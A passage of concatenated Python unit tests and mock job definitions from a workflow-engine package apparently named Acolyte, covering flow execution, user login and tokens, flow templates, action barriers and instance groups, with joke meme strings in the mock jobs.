"""
# 正常启动的情况
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
self.assertResultSuccess(rs)
self.assertTrue(rs.data.id > 0)
self._flow_instance_id_collector.append(rs.data.id)
# 使用一个不存在的tpl
rs = self._flow_exec.start_flow(
flow_template_id=100086,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
self.assertResultBadRequest(rs, "invalid_flow_template")
# 不合法的initiator
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=100086,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
self.assertResultBadRequest(rs, "invalid_initiator")
# 不合法的start参数
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": "aaaa", "y": 6}
)
self.assertResultBadRequest(rs, "start.x_invalid_type")
# 同时运行多个实例
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": "5", "y": 6}
)
self.assertResultBadRequest(rs, "too_many_instance")
def testHandleJobActions(self):
"""测试Job Action的处理流程
"""
# 创建一个Flow Instance先
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
# 执行一个不该执行的job step
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_target_step")
# 未trigger先执行一个action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "no_trigger")
# 测试正常执行trigger
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 7)
# 重复执行相同的action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "action_already_runned")
# actor不合法
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=100086,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_actor")
# 不合法的step name
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="eeeeeee",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "unknown_target_step")
# 不合法的action name
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="xxxxxxx",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "unknown_action_handler")
# 传入错误的flow_instance_id
rs = self._flow_exec.handle_job_action(
flow_instance_id=9999999,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_flow_instance")
# 当前step未完成,直接执行下一个
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "current_step_unfinished")
# 继续执行multiply action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 2
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 14)
# 执行minus action,该action将执行finish
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="minus",
actor=1,
action_args={
"d": 1,
"e": 2
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 11)
# echo step被finish之后再重新执行一次
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "step_already_runned")
# 执行下一个step - old man
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultSuccess(rs)
# 执行下一个action,返回bad request result
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="question",
actor=1,
action_args={
"question": "是不是钦定"
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "old_man_angry")
# 再来一次,这次返回ok result
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="question",
actor=1,
action_args={
"question": "董先森连任好不好啊"
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, "吼啊")
# 执行下一个step, 该step完成时会触发flow_meta的on_finish方法
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="job_A",
target_action="trigger",
actor=1,
action_args={
"x": 1,
"y": 2
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 3)
# 在已经标记为finished的flow_instance上执行
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_status")
# 重新走一遍,测试中途failure的情况
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 7)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 35)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="minus",
actor=1,
action_args={
"d": 1,
"e": 2
}
)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 32)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={}
)
self.assertResultSuccess(rs)
# 好! 执行angry action会failure整个flow
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="angry",
actor=1,
action_args={}
)
self.assertResultBadRequest(rs, "old_man_angry")
# failure flow之后再去执行某个步骤
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="job_A",
target_action="trigger",
actor=1,
action_args={
"x": 1,
"y": 2
}
)
self.assertResultBadRequest(rs, "invalid_status")
def testDiscardFlowInstance(self):
"""测试discard_flow_instance接口
"""
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
# 测试常规的取消
rs = self._flow_exec.discard_flow_instance(flow_instance.id, 1, "test")
self.assertResultSuccess(rs)
# 取消不存在的flow instance
rs = self._flow_exec.discard_flow_instance(999999, 1, "test")
self.assertResultBadRequest(rs, "flow_instance_not_found")
# 重复取消flow
rs = self._flow_exec.discard_flow_instance(flow_instance.id, 1, "test")
self.assertResultBadRequest(rs, "invalid_status")
def tearDown(self):
super(FlowExecutorServiceTestCase, self).tearDown() | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/flow_executor_service.py | flow_executor_service.py |
from acolyte.testing import EasemobFlowTestCase
from acolyte.core.storage.user import UserDAO
class UserServiceTestCase(EasemobFlowTestCase):
def setUp(self):
self._user_service = self._("UserService")
self._new_user_id_collector = [] # 用于收集测试所产生的新用户ID,在teardown中集中处理
def testLogin(self):
"""测试登录操作
"""
# 正常登录
rs = self._user_service.login("[email protected]", "123456")
self.assertResultSuccess(rs)
self.assertEqual(rs.data["id"], 1)
# 账号密码不匹配
rs = self._user_service.login("[email protected]", "654321")
self.assertResultBadRequest(rs, "no_match")
def testAddUser(self):
"""测试添加用户操作的各种情况
"""
# 正常添加
rs = self._user_service.add_user(
email="[email protected]",
password="123456",
name="SamChi",
role=1,
github_account="chihongze",
operator=1
)
self.assertResultSuccess(rs)
self.assertTrue(rs.data.id > 0)
self._new_user_id_collector.append(rs.data.id)
# 邮件不符合规则
rs = self._user_service.add_user(
email="hhhhh",
password="123456",
name="SamChi",
role=1,
github_account="chihongze",
operator=1
)
self.assertResultBadRequest(rs, "email_invalid_format")
# 重复注册
rs = self._user_service.add_user(
email="[email protected]",
password="654321",
name="Jackson",
role=1,
github_account="chihongze",
operator=1
)
self.assertResultBadRequest(rs, "email_exist")
# 指定一个不存在的角色
rs = self._user_service.add_user(
email="[email protected]",
password="789101",
name="Jackson",
role=10000,
github_account="chihongze",
operator=1
)
self.assertResultBadRequest(rs, "role_not_found")
# 指定一个不存在的operator
rs = self._user_service.add_user(
email="[email protected]",
password="789101",
name="Jackson",
role=1,
github_account="chihongze",
operator=10000
)
self.assertResultBadRequest(rs, "operator_not_found")
def testCheckToken(self):
"""测试token检查操作
"""
rs = self._user_service.login(
"[email protected]", "123456")
# 正常的token检测
token = rs.data["token"]
rs = self._user_service.check_token(token)
self.assertResultSuccess(rs)
self.assertEqual(rs.data["id"], 1)
self.assertEqual(rs.data["session_data"]["name"], "Sam")
# 错误token检测
rs = self._user_service.check_token("你们啊!naive!")
self.assertResultBadRequest(rs, "invalid_token")
def testLogout(self):
"""测试退出接口
"""
rs = self._user_service.login(
"[email protected]", "123456")
self.assertResultSuccess(rs)
token = rs.data["token"]
rs = self._user_service.check_token(token)
self.assertResultSuccess(rs)
rs = self._user_service.logout(token)
self.assertResultSuccess(rs)
rs = self._user_service.check_token(token)
self.assertResultBadRequest(rs, "invalid_token")
def testModifyPassword(self):
"""测试修改密码
"""
rs = self._user_service.modify_password(1, "123456", "654321")
self.assertResultSuccess(rs)
rs = self._user_service.modify_password(1, "123456", "654321")
self.assertResultBadRequest(rs, "old_password_incorrect")
self._user_service.modify_password(1, "654321", "123456")
def tearDown(self):
user_dao = UserDAO(self._("db"))
if self._new_user_id_collector:
user_dao.delete_by_id(self._new_user_id_collector) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/user_service.py | user_service.py |
from acolyte.core.job import (
AbstractJob,
ActionArg,
action_args,
action_constraint,
ActionLockType,
ActionLock,
ActionRunTimes,
)
from acolyte.core.service import Result
from acolyte.util.validate import IntField, StrField
from acolyte.core.action_queue import (
MySQLActionQueue,
Task
)
class EchoJob(AbstractJob):
"""该Job用于测试,打印事件和参数,并返回接收到的参数
"""
def __init__(self):
super().__init__(
"echo",
"test job echo",
action_queues=[
MySQLActionQueue(
"test", "queue_init", "consume", "ack"),
]
)
self._test_barrier = ("a", "b", "c")
@action_args(
ActionArg(IntField("a", required=True), ActionArg.MARK_CONST, "a的值"),
ActionArg(IntField("b", required=True), ActionArg.MARK_STATIC, "b的值"),
)
def on_trigger(self, context, a, b):
print("I received args: a={a}, b={b}".format(
a=a,
b=b
))
r = a + b
context["add_result"] = r
return Result.ok(data=r)
@action_args(
ActionArg(IntField("c", required=True), ActionArg.MARK_AUTO, "c的值")
)
def on_multiply(self, context, c):
print("I received args: c={c}".format(c=c))
r = int(context["add_result"]) * c
context["multiply_result"] = r
return Result.ok(data=r)
@action_args(
ActionArg(IntField("d", required=True), ActionArg.MARK_AUTO, "d的值"),
ActionArg(IntField("e", required=True), ActionArg.MARK_AUTO, "e的值")
)
def on_minus(self, context, d, e):
print("I received args: d={d}, e={e}".format(d=d, e=e))
r = int(context["multiply_result"]) - d - e
context.finish()
return Result.ok(data=r)
@action_args(
ActionArg(IntField("sleep_time", required=True),
ActionArg.MARK_AUTO, "sleep time"),
)
def on_pass(self, context):
...
def on_a(self, context):
context.finish(waiting_for=self._test_barrier)
def on_b(self, context):
context.finish(waiting_for=self._test_barrier)
def on_c(self, context):
context.finish(waiting_for=self._test_barrier)
@action_constraint(
lock=ActionLock("repeat_action", ActionLockType.USER_EXCLUSIVE_LOCK),
run_times=ActionRunTimes.NO_LIMIT
)
def on_repeat(self, context):
context.save({"a": 1})
def on_queue_init(self, context):
tasks = [Task.from_args({"count": i}) for i in range(5)]
context.queue.test.init(*tasks, trigger_consume_action=True)
@action_constraint(
lock=None,
run_times=ActionRunTimes.NO_LIMIT
)
def on_consume(self, context):
task = context.queue.test.take()
if task:
print(task.args)
@action_args(
ActionArg(
IntField("task_id", required=True),
mark=ActionArg.MARK_AUTO,
comment="任务ID"
),
)
@action_constraint(
lock=None,
run_times=ActionRunTimes.NO_LIMIT
)
def on_ack(self, context, task_id):
context.queue.test.ack(task_id, trigger_consume_action=True,
auto_finish=True)
class OldManJob(AbstractJob):
"""Mock Job 长者Job
"""
def __init__(self):
super().__init__("old_man", "old man job")
def on_trigger(self, context):
print("old man job on trigger")
return Result.ok(data="跑的比谁都快")
@action_args(
ActionArg(
StrField("question", required=True), ActionArg.MARK_AUTO, "向长者提问")
)
def on_question(self, context, question):
if question == "董先森连任好不好啊":
context.finish()
return Result.ok(data="吼啊")
else:
return Result.bad_request("old_man_angry", msg="无可奉告")
def on_angry(self, context):
print("I'm angry! 你们这样子是不行的!我要终止整个flow!")
context.failure()
return Result.bad_request("old_man_angry", msg="I'm angry!")
def letter_job_meta(letter):
class LetterJobMeta(type):
def __new__(cls, name, bases, attrs):
def _make_method(action):
@action_args(
ActionArg(
IntField("x", required=True),
ActionArg.MARK_AUTO, "arg x"),
ActionArg(
IntField("y", required=True),
ActionArg.MARK_AUTO, "arg y")
)
def method(self, context, x, y):
context.finish()
return Result.ok(data=(x + y))
return method
attrs["on_trigger"] = _make_method("trigger")
attrs["__init__"] = lambda self: AbstractJob.__init__(
self, "job_" + letter, "job " + letter)
bases += (AbstractJob,)
return type(name, bases, attrs)
return LetterJobMeta
class AJob(metaclass=letter_job_meta("A")):
...
class BJob(metaclass=letter_job_meta("B")):
...
class CJob(metaclass=letter_job_meta("C")):
...
class DJob(metaclass=letter_job_meta("D")):
... | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/job.py | job.py |
from acolyte.core.service import Result
from acolyte.testing import EasemobFlowTestCase
from acolyte.core.storage.flow_template import FlowTemplateDAO
class FlowServiceTestCase(EasemobFlowTestCase):
def setUp(self):
self.flow_service = self._("FlowService")
self.flow_meta_mgr = self._("flow_meta_manager")
self.flow_tpl_dao = FlowTemplateDAO(self._("db"))
self._flow_tpl_collector = []
def test_get_all_flow_meta(self):
"""测试获取所有的flow meta对象信息
"""
result = self.flow_service.get_all_flow_meta()
self.assertEqual(result.status_code, Result.STATUS_SUCCESS)
def test_get_flow_meta_info(self):
"""测试获取单个flow_meta对象
"""
# 测试正常返回的情况
result = self.flow_service.get_flow_meta_info("test_flow")
self.assertEqual(result.status_code, Result.STATUS_SUCCESS)
# 找不到指定的flow meta
result = self.flow_service.get_flow_meta_info("heheda")
self.assertEqual(result.status_code, Result.STATUS_BADREQUEST)
self.assertEqual(result.reason, "flow_meta_not_exist")
def testValidateTplBindArgs(self):
"""测试验证绑定参数
"""
flow_meta = self.flow_meta_mgr.get("test_flow")
# 正常验证通过
rs = self.flow_service._validate_tpl_bind_args(flow_meta, {}, {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 10
},
"minus": {
"d": 2,
"e": 3
}
}
})
self.assertResultSuccess(rs)
# 测试是否能对参数应用转换
rs = self.flow_service._validate_tpl_bind_args(flow_meta, {}, {
"echo": {
"trigger": {
"b": "2",
},
"multiply": {
"c": "3",
},
"minus": {
"d": "11",
"e": "12"
}
}
})
self.assertResultSuccess(rs)
# 测试出错的情况
rs = self.flow_service._validate_tpl_bind_args(flow_meta, {}, {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": "1a",
"e": "10"
},
}
})
self.assertResultBadRequest(rs, "echo_minus_d_invalid_type")
def testCreateFlowTemplate(self):
"""测试创建flow template
"""
bind_args = {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
# 正常创建
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultSuccess(rs)
self._flow_tpl_collector.append(rs.data.id)
# 创建重名
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultBadRequest(rs, "name_already_exist")
# flow meta不存在
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow_x",
name="sam_testx",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultBadRequest(rs, "flow_meta_not_exist")
# creator不存在
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test_x",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=2
)
self.assertResultBadRequest(rs, "invalid_creator_id")
# bind_args验证出问题
err_bind_args = {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": "1a",
"e": "1"
}
}
}
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test_x",
bind_args=err_bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultBadRequest(rs, "echo_minus_d_invalid_type")
def testModifyFlowTemplate(self):
"""测试修改Flow template
"""
flow_tpl_s = self._create_tpl("sam_test")
flow_tpl_j = self._create_tpl("jack_test")
default_bind_args = {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
# 试图修改一个不存在的ID
rs = self.flow_service.modify_flow_template(
flow_tpl_id=10000,
name="aaaaa",
bind_args={
},
max_run_instance=1,
config={
}
)
self.assertResultBadRequest(rs, "tpl_not_found")
# 测试修改名称
# 原封不动
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name=flow_tpl_s.name,
bind_args=default_bind_args,
max_run_instance=1,
config={}
)
self.assertResultSuccess(rs)
# 名称被改,但是已经存在了
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name=flow_tpl_j.name,
bind_args=default_bind_args,
max_run_instance=1,
config={
}
)
self.assertResultBadRequest(rs, "name_exist")
# 使用新的名字
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_x",
bind_args=default_bind_args,
max_run_instance=1,
config={}
)
tpl = self.flow_tpl_dao.query_flow_template_by_id(
flow_tpl_s.id)
self.assertEqual(tpl.name, "test_x")
# 测试修改绑定参数
# 使用错误的参数
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_x",
bind_args={
"echo": {
"trigger": {
"b": "xxxxxx"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={}
)
self.assertResultBadRequest(rs, "echo_trigger_b_invalid_type")
# 使用正确的参数
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_x",
bind_args={
"echo": {
"trigger": {
"b": "50"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={}
)
self.assertResultSuccess(rs)
tpl = self.flow_tpl_dao.query_flow_template_by_id(
flow_tpl_s.id)
self.assertEqual(
tpl.bind_args["echo"]["trigger"]["b"], 50)
# 修改所有
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_y",
bind_args={
"echo": {
"trigger": {
"b": "100"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=2,
config={
"x": 1,
"y": 2
}
)
self.assertResultSuccess(rs)
tpl = self.flow_tpl_dao.query_flow_template_by_id(flow_tpl_s.id)
self.assertEqual(tpl.bind_args["echo"]["trigger"]["b"], 100)
self.assertEqual(tpl.max_run_instance, 2)
self.assertEqual(tpl.config, {"x": 1, "y": 2})
def testGetAllFlowTemplates(self):
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args={
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={},
creator=1
)
self._flow_tpl_collector.append(rs.data.id)
rs = self.flow_service.get_all_flow_templates()
self.assertResultSuccess(rs)
self.assertEqual(len(rs.data), 1)
def _create_tpl(self, tpl_name):
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name=tpl_name,
bind_args={
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={},
creator=1
)
flow_tpl_id = rs.data.id
self._flow_tpl_collector.append(flow_tpl_id)
self.assertResultSuccess(rs)
return rs.data
def tearDown(self):
if self._flow_tpl_collector:
self.flow_tpl_dao.delete_by_id(self._flow_tpl_collector) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/flow_service.py | flow_service.py |
from acolyte.core.job import JobStatus
from acolyte.testing.core.flow_executor_service import (
AbstractFlowExecTestCase
)
class ActionBarrierTestCase(AbstractFlowExecTestCase):
def setUp(self):
super(ActionBarrierTestCase, self).setUp()
def testActionBarrier(self):
"""测试action barrier的执行
"""
# 开启一个新的flow instance
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
# 执行 trigger
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={
}
)
self.print_json(rs)
# 执行a action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="a",
actor=1,
action_args={
}
)
self.print_json(rs)
self.assertJobInstanceStatus(
flow_instance.id, "echo", JobStatus.STATUS_RUNNING)
# 执行b action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="b",
actor=1,
action_args={
}
)
self.print_json(rs)
self.assertJobInstanceStatus(
flow_instance.id, "echo", JobStatus.STATUS_RUNNING)
# 执行c action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="c",
actor=1,
action_args={
}
)
self.print_json(rs)
self.assertJobInstanceStatus(
flow_instance.id, "echo", JobStatus.STATUS_FINISHED)
def assertJobInstanceStatus(self, flow_instance_id, step_name, status):
job_instance = self._job_instance_dao.\
query_by_instance_id_and_step(flow_instance_id, step_name)
self.assertEqual(job_instance.status, status)
def tearDown(self):
super(ActionBarrierTestCase, self).tearDown() | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/action_barrier.py | action_barrier.py |
import datetime
import acolyte.testing.core.flow_executor_service as fes
from acolyte.core.storage.flow_instance_group import (
FlowInstanceGroupDAO,
FlowInstanceGroupRelationDAO
)
class FlowInstanceGroupTestCase(fes.AbstractFlowExecTestCase):
def setUp(self):
super(FlowInstanceGroupTestCase, self).setUp()
self._group_id_collector = []
self._flow_instance_group_dao = FlowInstanceGroupDAO(self._db)
self._flow_instance_group_rlt_dao = FlowInstanceGroupRelationDAO(
self._db)
# 创建一个flow template供测试使用
bind_args = {
"echo": {
"trigger": {
"b": "$config.b"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
rs = self._flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test_x",
bind_args=bind_args,
max_run_instance=0,
config={"dev_email": "[email protected]", "b": 2},
creator=1
)
self._tpl_id = rs.data.id
self._flow_tpl_id_collector.append(self._tpl_id)
def testGroupOperation(self):
"""测试flow instance group的相关操作
"""
begin_date = datetime.date.today()
# 创建 flow instance group
rs = self._flow_exec.create_flow_instance_group(
name="rest_v1.4.2",
description="rest v1.4.2 更新",
meta={}
)
self.assertResultSuccess(rs)
self._group_id_collector.append(rs.data.id)
group_id = rs.data.id
# 创建同名的 flow instance group
rs = self._flow_exec.create_flow_instance_group(
name="rest_v1.4.2",
description="rest v1.4.2 更新",
meta={}
)
self.assertResultBadRequest(rs, "group_existed")
# 创建隶属该组的flow instance
instance_id_lst = []
for _ in range(5):
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="hehehe",
start_flow_args={
"x": 5, "y": 6
},
group=group_id
)
self.assertResultSuccess(rs)
flow_instance_id = rs.data.id
instance_id_lst.append(flow_instance_id)
self._flow_instance_id_collector.append(flow_instance_id)
self.assertTrue(self._flow_instance_group_rlt_dao
.is_in_group(flow_instance_id, group_id))
# 丢弃一个instance
self._flow_exec.discard_flow_instance(
flow_instance_id=instance_id_lst[0],
actor_id=1,
discard_reason="呵呵"
)
# 测试视图查看
# 查看某group详情
rs = self._flow_service.get_flow_instance_group_details(group_id)
self.print_json(rs)
self.assertResultSuccess(rs)
# 查看group历史
end_date = begin_date
rs = self._flow_service.get_flow_instance_group_history(
begin_date, end_date)
self.print_json(rs)
self.assertResultSuccess(rs)
group_status = rs.data[0].sub_flow_status
self.assertEqual(group_status["running"], 4)
self.assertEqual(group_status["discard"], 1)
def tearDown(self):
super(FlowInstanceGroupTestCase, self).tearDown()
for group_id in self._group_id_collector:
self._flow_instance_group_dao.delete(group_id)
self._flow_instance_group_rlt_dao.delete_by_group_id(group_id) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/flow_instance_group.py | flow_instance_group.py |
from acolyte.testing.core.job import (
EchoJob,
OldManJob,
AJob,
BJob,
CJob,
DJob,
)
from acolyte.core.mgr import (
DictBasedManager,
JobManager
)
from acolyte.core.job import JobRef
from acolyte.core.flow import FlowMeta
from acolyte.core.notify import NotifyTemplate
from acolyte.util.validate import (
IntField,
declare_args
)
class TestFlowMeta(FlowMeta):
def __init__(self):
super().__init__(
name="test_flow",
description="just a test flow",
jobs=(
JobRef(
"echo",
trigger={
"a": 5
},
finish={
},
failure={
}
),
JobRef("old_man"),
JobRef("job_A"),
),
start_args={
"x": -1,
"y": -2
},
)
@declare_args(
IntField("x", required=True),
IntField("y", required=True)
)
def on_start(self, context, x, y):
print("start the workflow, x = {x}, y = {y}".format(
x=x,
y=y
))
print("=====> dev email: {}".format(context.config["dev_email"]))
def on_failure(self, context):
print("the whole workflow failure")
def on_finish(self, context):
print("the whole workflow finished")
# 构建测试使用的容器
flow_meta_mgr = DictBasedManager()
test_flow_meta = TestFlowMeta()
flow_meta_mgr.register(test_flow_meta.name, test_flow_meta)
job_mgr = JobManager("acolyte.job")
echo_job = EchoJob()
job_mgr.register(echo_job.name, echo_job)
old_man_job = OldManJob()
job_mgr.register(old_man_job.name, old_man_job)
for job_type in (AJob, BJob, CJob, DJob):
job = job_type()
job_mgr.register(job.name, job)
notify_tpl_mgr = DictBasedManager()
notify_tpl_mgr.register("test", NotifyTemplate(
name="test",
subject_template="你好,{name}",
content_template="{name} 你好,我真的是查水表的。",
digest_template="{name} 快开门,查水表的。"
)) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/mgr_define.py | mgr_define.py |
import simplejson as json
from acolyte.testing import EasemobFlowTestCase, MockContext
from acolyte.builtin_ext.github import (
GithubPushJob,
TravisCIJob,
)
from acolyte.util.lang import get_from_nested_dict
class GithubPushJobTestCase(EasemobFlowTestCase):
def setUp(self):
self._ctx = MockContext(
executor=None,
config={},
flow_instance_id=0,
job_instance_id=0,
job_action_id=0,
current_step="github_push"
)
self._github_push_job = GithubPushJob()
def testTrigger(self):
with open("resource/testing/github_push_res.json") as f:
hook_data = json.loads(f.read())
self._github_push_job.on_trigger(self._ctx, hook_data)
self.assertEqual(
get_from_nested_dict(
self._ctx.saved_data, 0, 0, 0, "pusher", "email"),
"[email protected]"
)
class TravisCIJobTestCase(EasemobFlowTestCase):
def setUp(self):
self._ctx = MockContext(
executor=None,
config={
"jar_saved_dir": "/tmp",
"jar_download_base_url": "http://127.0.0.1/jars"
},
flow_instance_id=0,
job_instance_id=0,
job_action_id=0,
current_step="travis"
)
self._travis_ci_job = TravisCIJob()
def testTrigger(self):
self._travis_ci_job.on_trigger(self._ctx)
self.assertIsNotNone(
get_from_nested_dict(self._ctx.saved_data, 0, 0, 0, "begin_time"))
def testOnBuildFinish(self):
with open("resource/testing/base64_jar", "r") as f:
base64_code = f.read()
# 构建正常
self._travis_ci_job.on_build_finish(
self._ctx,
build_result=0,
test_result={
},
findbug_result={
},
jar_file_name="testjar.jar",
jar_base64=base64_code
)
self.assertIsNotNone(self._ctx["jar_download_url"])
self.assertEqual(
get_from_nested_dict(
self._ctx.saved_data, 0, 0, 0, "build_result"), 0)
self.assertIsNotNone(
get_from_nested_dict(
self._ctx.saved_data, 0, 0, 0, "jar_download_url")) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/builtin_ext/github.py | github.py |
import typing
from acolyte.testing import EasemobFlowTestCase
from acolyte.util.validate import (
